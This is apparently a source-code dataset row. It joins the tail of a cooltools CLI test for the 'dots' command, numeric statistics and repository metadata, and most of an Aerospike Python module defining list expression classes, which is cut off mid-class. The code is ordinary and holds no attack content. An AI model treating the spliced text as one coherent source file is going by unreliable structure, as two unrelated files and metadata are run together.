    """
    data_dir = request.fspath.dirname
    cool_path = op.join(data_dir, "data/CN.mm9.1000kb.cool")
    expected_path = op.join(data_dir, "data/CN.mm9.toy_expected.tsv")
    view_path = op.join(data_dir, "data/CN.mm9.toy_regions.bed")
    prefix = op.join(tmpdir, "test.dots")

    outcome = CliRunner().invoke(
        cli,
        [
            "dots",
            "--view", view_path,
            "-p", 1,
            "--kernel-width", 2,
            "--kernel-peak", 1,
            "--tile-size", 60_000_000,
            "--max-loci-separation", 100_000_000,
            "--out-prefix", prefix,
            cool_path,
            expected_path,
        ],
    )
    assert outcome.exit_code == 0

    # Both output files must have been written.
    assert op.isfile(f"{prefix}.enriched.tsv")
    assert op.isfile(f"{prefix}.postproc.bedpe")
# TODO: Remove this test once "regions" are deprecated altogether:
def test_call_dots_regions_deprecated_cli(request, tmpdir):
    """Run `cooltools dots` with the deprecated --regions flag and expect success.

    call-dots requires a ucsc-named expected table and view.
    """
    data_dir = request.fspath.dirname
    cool_path = op.join(data_dir, "data/CN.mm9.1000kb.cool")
    expected_path = op.join(data_dir, "data/CN.mm9.toy_expected.tsv")
    regions_path = op.join(data_dir, "data/CN.mm9.toy_regions.bed")
    prefix = op.join(tmpdir, "test.dots")

    args = [
        "dots",
        "--regions", regions_path,
        "-p", 1,
        "--kernel-width", 2,
        "--kernel-peak", 1,
        "--tile-size", 60_000_000,
        "--max-loci-separation", 100_000_000,
        "--out-prefix", prefix,
        cool_path,
        expected_path,
    ]
    outcome = CliRunner().invoke(cli, args)
    assert outcome.exit_code == 0

    # Both output files must have been written.
    assert op.isfile(f"{prefix}.enriched.tsv")
    assert op.isfile(f"{prefix}.postproc.bedpe")
| 28.358491 | 109 | 0.561211 | 373 | 3,006 | 4.364611 | 0.246649 | 0.040541 | 0.063882 | 0.093366 | 0.772727 | 0.772727 | 0.772727 | 0.772727 | 0.772727 | 0.772727 | 0 | 0.040019 | 0.310047 | 3,006 | 105 | 110 | 28.628571 | 0.744937 | 0.115103 | 0 | 0.808989 | 0 | 0 | 0.221259 | 0.142103 | 0 | 0 | 0 | 0.009524 | 0.078652 | 1 | 0.033708 | false | 0 | 0.033708 | 0 | 0.067416 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d3e0669a72fd4a4883dec6a69028023f6abf7602 | 45,858 | py | Python | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | aerospike_helpers/expressions/list.py | mcoberly2/aerospike-client-python | d405891f0d6d8b2fc14f78841370bc6a1d302494 | [
"Apache-2.0"
] | null | null | null | ##########################################################################
# Copyright 2013-2021 Aerospike, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##########################################################################
'''
List expressions contain expressions for reading and modifying Lists. Most of
these operations are from the standard :mod:`List API <aerospike_helpers.operations.list_operations>`.
Example::
import aerospike_helpers.expressions as exp
#Take the size of list bin "a".
expr = exp.ListSize(None, exp.ListBin("a")).compile()
'''
from __future__ import annotations
from itertools import chain
from typing import List, Optional, Tuple, Union, Dict, Any
import aerospike
from aerospike_helpers import cdt_ctx
from aerospike_helpers.expressions.resources import _GenericExpr
from aerospike_helpers.expressions.resources import _BaseExpr
from aerospike_helpers.expressions.resources import _ExprOp
from aerospike_helpers.expressions.resources import ResultType
from aerospike_helpers.expressions.resources import _Keys
from aerospike_helpers.expressions.base import ListBin
######################
# List Mod Expressions
######################
# Type aliases for the values expression constructors accept.
# Most parameters take either a concrete value or a _BaseExpr evaluating to one.
TypeBinName = Union[_BaseExpr, str]  # bin expression or bin name string
TypeListValue = Union[_BaseExpr, List[Any]]  # list literal or list expression
TypeIndex = Union[_BaseExpr, int, aerospike.CDTInfinite]  # list index, possibly unbounded
TypeCTX = Union[None, List[cdt_ctx._cdt_ctx]]  # optional nested-CDT context chain
TypeRank = Union[_BaseExpr, int, aerospike.CDTInfinite]  # list rank, possibly unbounded
TypeCount = Union[_BaseExpr, int, aerospike.CDTInfinite]  # element count, possibly unbounded
TypeValue = Union[_BaseExpr, Any]  # arbitrary value or expression
TypePolicy = Union[Dict[str, Any], None]  # optional list-policy dictionary
class ListAppend(_BaseExpr):
    """Expression that appends a single value to the end of a list."""
    _op = aerospike.OP_LIST_APPEND

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            value (TypeValue): Value or value expression to append to the list.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: List expression.

        Example::

            # Check if length of list bin "a" is > 5 after appending 1 item.
            expr = exp.GT(
                exp.ListSize(None, exp.ListAppend(None, None, 3, exp.ListBin("a"))),
                5).compile()
        """
        policy_arg = {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (
            value,
            _GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, policy_arg),
            target,
        )
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListAppendItems(_BaseExpr):
    """Expression that appends every item of a list to the end of a list."""
    _op = aerospike.OP_LIST_APPEND_ITEMS

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            value (TypeValue): List or list expression of items to be appended.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: List expression.

        Example::

            # Check if length of list bin "a" is > 5 after appending multiple items.
            expr = exp.GT(
                exp.ListSize(None, exp.ListAppendItems(None, None, [3, 2], exp.ListBin("a"))),
                5).compile()
        """
        policy_arg = {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (
            value,
            _GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, policy_arg),
            target,
        )
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListInsert(_BaseExpr):
    """Expression that inserts a value at the specified index of a list."""
    _op = aerospike.OP_LIST_INSERT

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): Target index for insertion, integer or integer expression.
            value (TypeValue): Value or value expression to be inserted.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: List expression.

        Example::

            # Check if list bin "a" has length > 5 after insert.
            expr = exp.GT(
                exp.ListSize(None, exp.ListInsert(None, None, 0, 3, exp.ListBin("a"))),
                5).compile()
        """
        policy_arg = {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (
            index,
            value,
            _GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, policy_arg),
            target,
        )
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListInsertItems(_BaseExpr):
    """Expression that inserts each input list item starting at a given index."""
    _op = aerospike.OP_LIST_INSERT_ITEMS

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, values: TypeListValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): Target index where item insertion will begin, integer or integer expression.
            values (TypeListValue): List or list expression of items to be inserted.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: List expression.

        Example::

            # Check if list bin "a" has length > 5 after inserting items.
            expr = exp.GT(
                exp.ListSize(None, exp.ListInsertItems(None, None, 0, [4, 7], exp.ListBin("a"))),
                5).compile()
        """
        policy_arg = {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (
            index,
            values,
            _GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, policy_arg),
            target,
        )
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListIncrement(_BaseExpr):
    """Expression that increments list[index] by a value."""
    _op = aerospike.OP_LIST_INCREMENT

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): Index of value to increment.
            value (TypeValue): Value or value expression.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: List expression.

        Example::

            # Check if incremented value in list bin "a" is the largest in the list.
            expr = exp.Eq(
                exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, -1,  # rank of -1 == largest element.
                    exp.ListIncrement(None, None, 1, 5, exp.ListBin("a"))),
                exp.ListGetByIndex(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 1,
                    exp.ListIncrement(None, None, 1, 5, exp.ListBin("a")))
            ).compile()
        """
        policy_arg = {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (
            index,
            value,
            _GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_CRMOD, 0, policy_arg),
            target,
        )
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListSet(_BaseExpr):
    """Expression that sets the item value at a specified index in a list."""
    _op = aerospike.OP_LIST_SET

    def __init__(self, ctx: TypeCTX, policy: TypePolicy, index: TypeIndex, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            policy (TypePolicy): Optional dictionary of :ref:`List policies <aerospike_list_policies>`.
            index (TypeIndex): index of value to set.
            value (TypeValue): value or value expression to set index in list to.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: List expression.

        Example::

            # Get smallest element in list bin "a" after setting index 1 to 10.
            expr = exp.ListGetByRank(None, aerospike.LIST_RETURN_VALUE, ResultType.INTEGER, 0,
                    exp.ListSet(None, None, 1, 10, exp.ListBin("a"))).compile()
        """
        policy_arg = {_Keys.LIST_POLICY_KEY: policy} if policy is not None else {}
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (
            index,
            value,
            _GenericExpr(_ExprOp._AS_EXP_CODE_CDT_LIST_MOD, 0, policy_arg),
            target,
        )
        fixed = {}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        if policy is not None:
            fixed[_Keys.LIST_POLICY_KEY] = policy
        self._fixed = fixed
class ListClear(_BaseExpr):
    """Expression that removes every item from a list."""
    _op = aerospike.OP_LIST_CLEAR

    def __init__(self, ctx: TypeCTX, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: List expression.

        Example::

            # Clear list value of list nested in list bin "a" index 1.
            from aerospike_helpers import cdt_ctx
            expr = exp.ListClear([cdt_ctx.cdt_ctx_list_index(1)], "a").compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (target,)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListSort(_BaseExpr):
    """Expression that sorts a list."""
    _op = aerospike.OP_LIST_SORT

    def __init__(self, ctx: TypeCTX, order: int, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            order (int): Optional flags modifiying the behavior of list_sort. This should be constructed by bitwise or'ing together values from :ref:`aerospike_list_sort_flag`.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Get value of sorted list bin "a".
            expr = exp.ListSort(None, aerospike.LIST_SORT_DEFAULT, "a").compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (target,)
        fixed = {_Keys.LIST_ORDER_KEY: order}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListRemoveByValue(_BaseExpr):
    """Expression that removes list items identified by value."""
    _op = aerospike.OP_LIST_REMOVE_BY_VALUE

    def __init__(self, ctx: TypeCTX, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            value (TypeValue): Value or value expression to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # See if list bin "a", with `3` removed, is equal to list bin "b".
            expr = exp.Eq(exp.ListRemoveByValue(None, 3, exp.ListBin("a")), ListBin("b")).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueList(_BaseExpr):
    """Expression that removes list items identified by a list of values."""
    _op = aerospike.OP_LIST_REMOVE_BY_VALUE_LIST

    def __init__(self, ctx: TypeCTX, values: TypeListValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            values (TypeListValue): List of values or list expression.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Remove elements with values [1, 2, 3] from list bin "a".
            expr = exp.ListRemoveByValueList(None, [1, 2, 3], exp.ListBin("a")).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (values, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueRange(_BaseExpr):
    """ Expression that removes list items whose value falls in the range
    [begin, end) — begin inclusive, end exclusive. A begin of None means
    "less than end"; an end of None means "greater than or equal to begin".
    """
    _op = aerospike.OP_LIST_REMOVE_BY_VALUE_RANGE

    def __init__(self, ctx: TypeCTX, begin: TypeValue, end: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            begin (TypeValue): Begin value or value expression for range.
            end (TypeValue): End value or value expression for range.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Remove list of items with values >= 3 and < 7 from list bin "a".
            expr = exp.ListRemoveByValueRange(None, 3, 7, exp.ListBin("a")).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (begin, end, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueRelRankToEnd(_BaseExpr):
    """Expression that removes list items nearest to value and greater, by relative rank."""
    _op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            value (TypeValue): Start value or value expression.
            rank (TypeRank): Rank integer or integer expression.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Remove elements larger than 4 by relative rank in list bin "a".
            expr = exp.ListRemoveByValueRelRankToEnd(None, 4, 1, exp.ListBin("a")).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, rank, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByValueRelRankRange(_BaseExpr):
    """ Expression that removes list items nearest to value and greater, by
    relative rank, up to a count limit.
    """
    _op = aerospike.OP_LIST_REMOVE_BY_REL_RANK_RANGE

    def __init__(self, ctx: TypeCTX, value: TypeValue, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            value (TypeValue): Start value or value expression.
            rank (TypeRank): Rank integer or integer expression.
            count (TypeCount): How many elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # After removing the 3 elements larger than 4 by relative rank, does list bin "a" include 9?.
            expr = exp.GT(
                exp.ListGetByValue(None, aerospike.LIST_RETURN_COUNT, 9,
                    exp.ListRemoveByValueRelRankRange(None, 4, 1, 0, exp.ListBin("a"))),
                0).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, rank, count, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByIndex(_BaseExpr):
    """Expression that removes the list item at a specified index."""
    _op = aerospike.OP_LIST_REMOVE_BY_INDEX

    def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            index (TypeIndex): Index integer or integer expression of element to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Get size of list bin "a" after index 3 has been removed.
            expr = exp.ListSize(None, exp.ListRemoveByIndex(None, 3, exp.ListBin("a"))).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByIndexRangeToEnd(_BaseExpr):
    """Expression that removes list items from a specified index to the end of the list."""
    _op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, index: TypeIndex, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            index (TypeIndex): Starting index integer or integer expression of elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Remove all elements starting from index 3 in list bin "a".
            expr = exp.ListRemoveByIndexRangeToEnd(None, 3, exp.ListBin("a")).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByIndexRange(_BaseExpr):
    """Expression that removes "count" list items starting at a specified index."""
    _op = aerospike.OP_LIST_REMOVE_BY_INDEX_RANGE

    def __init__(self, ctx: TypeCTX, index: TypeIndex, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            index (TypeIndex): Starting index integer or integer expression of elements to remove.
            count (TypeCount): Integer or integer expression, how many elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Get size of list bin "a" after index 3, 4, and 5 have been removed.
            expr = exp.ListSize(None, exp.ListRemoveByIndexRange(None, 3, 3, exp.ListBin("a"))).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (index, count, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByRank(_BaseExpr):
    """Expression that removes the list item identified by rank."""
    _op = aerospike.OP_LIST_REMOVE_BY_RANK

    def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): Optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            rank (TypeRank): Rank integer or integer expression of element to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Remove smallest value in list bin "a".
            expr = exp.ListRemoveByRank(None, 0, exp.ListBin("a")).compile()
        """
        target = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, target)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByRankRangeToEnd(_BaseExpr):
    """Create an expression that removes list items starting at specified rank to the last ranked item."""
    _op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE_TO_END

    def __init__(self, ctx: TypeCTX, rank: TypeRank, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            rank (TypeRank): Rank integer or integer expression of element to start removing at.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Remove the 2 largest elements from List bin "a".
            expr = exp.ListRemoveByRankRangeToEnd(None, -2, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, bin_expr)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListRemoveByRankRange(_BaseExpr):
    """Create an expression that removes "count" list items starting at specified rank."""
    _op = aerospike.OP_LIST_REMOVE_BY_RANK_RANGE

    def __init__(self, ctx: TypeCTX, rank: TypeRank, count: TypeCount, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            rank (TypeRank): Rank integer or integer expression of element to start removing at.
            count (TypeCount): Count integer or integer expression of elements to remove.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: list expression.

        Example::

            # Remove the 3 smallest items from list bin "a".
            expr = exp.ListRemoveByRankRange(None, 0, 3, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (rank, count, bin_expr)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
#######################
# List Read Expressions
#######################
class ListSize(_BaseExpr):
    """Create an expression that returns list size."""
    _op = aerospike.OP_LIST_SIZE

    def __init__(self, ctx: TypeCTX, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Integer expression.

        Example::

            # Take the size of list bin "a".
            expr = exp.ListSize(None, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (bin_expr,)
        self._fixed = {} if ctx is None else {_Keys.CTX_KEY: ctx}
class ListGetByValue(_BaseExpr):
    """ Create an expression that selects list items identified by value and returns selected
        data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeValue): Value or value expression of element to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the index of the element with value, 3, in list bin "a".
            expr = exp.ListGetByValue(None, aerospike.LIST_RETURN_INDEX, 3, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByValueRange(_BaseExpr):
    """ Create an expression that selects list items identified by value range and returns selected
        data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE_RANGE

    def __init__(
        self,
        ctx: TypeCTX,
        return_type: int,
        value_begin: TypeValue,
        value_end: TypeValue,
        bin: TypeBinName
    ):
        """ Create an expression that selects list items identified by value range and returns selected
            data specified by return_type.

        Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value_begin (TypeValue): Value or value expression of first element to get.
            value_end (TypeValue): Value or value expression of ending element.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get rank of values between 3 (inclusive) and 7 (exclusive) in list bin "a".
            expr = exp.ListGetByValueRange(None, aerospike.LIST_RETURN_RANK, 3, 7, exp.ListBin("a")).compile()
        """
        # A raw bin name is wrapped in a ListBin expression; expressions pass through.
        bin_expr = bin if isinstance(bin, _BaseExpr) else ListBin(bin)
        self._children = (value_begin, value_end, bin_expr)
        fixed = {_Keys.RETURN_TYPE_KEY: return_type}
        if ctx is not None:
            fixed[_Keys.CTX_KEY] = ctx
        self._fixed = fixed
class ListGetByValueList(_BaseExpr):
    """ Create an expression that selects list items identified by values and returns selected
        data specified by return_type.
    """
    _op = aerospike.OP_LIST_GET_BY_VALUE_LIST

    def __init__(self, ctx: TypeCTX, return_type: int, value: TypeListValue, bin: TypeBinName):
        """ Args:
            ctx (TypeCTX): An optional list of nested CDT :mod:`cdt_ctx <aerospike_helpers.cdt_ctx>` context operation objects.
            return_type (int): Value specifying what should be returned from the operation.
                This should be one of the :ref:`list_return_types` values.
            value (TypeListValue): List or list expression of values of elements to get.
            bin (TypeBinName): bin expression, such as :class:`~aerospike_helpers.expressions.base.MapBin` or :class:`~aerospike_helpers.expressions.base.ListBin`.

        :return: Expression.

        Example::

            # Get the indexes of the elements in list bin "a" with values [3, 6, 12].
            expr = exp.ListGetByValueList(None, aerospike.LIST_RETURN_INDEX, [3, 6, 12], exp.ListBin("a")).compile()
        """
        self._children = (
            value,
